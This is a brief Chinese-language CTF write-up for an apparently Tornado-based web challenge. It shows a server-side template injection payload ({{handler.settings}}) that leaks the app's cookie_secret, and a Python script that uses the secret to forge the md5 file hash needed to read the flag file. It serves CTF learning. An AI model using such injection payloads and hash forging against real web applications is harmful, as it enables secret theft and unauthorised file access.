网站存在以下三个目录
/flag.txt
flag in /fllllllllllllag/welcome.txt
render知识点1: render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。
/hints.txt
md5(cookie_secret+md5(filename))随便点进去一个,发现url变为?filename=/hints.txt&filehash=e2898b8280e949ad882875ab0f3f419e 把filename改成/fllllllllllllag,提示错误。 url为?msg=Error 看大佬的WP, 存在模板注入(之前都没听说过), 改成?msg={{handler.settings}}试试
显示出cookie_secret
python脚本获取md5值
import hashlib
def md5value(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def encode():
filename = '/fllllllllllllag'
cookie_s ="18350aee-4e87-45f2-a56e-3ecffbdbf543"
print(md5value(filename.encode('utf-8')))
x=md5value(filename.encode('utf-8'))
y=cookie_s+x
print(md5value(y.encode('utf-8')))
encode()拿着filename和filehash传参访问,得到flag。
模板注入什么的真的看不懂…
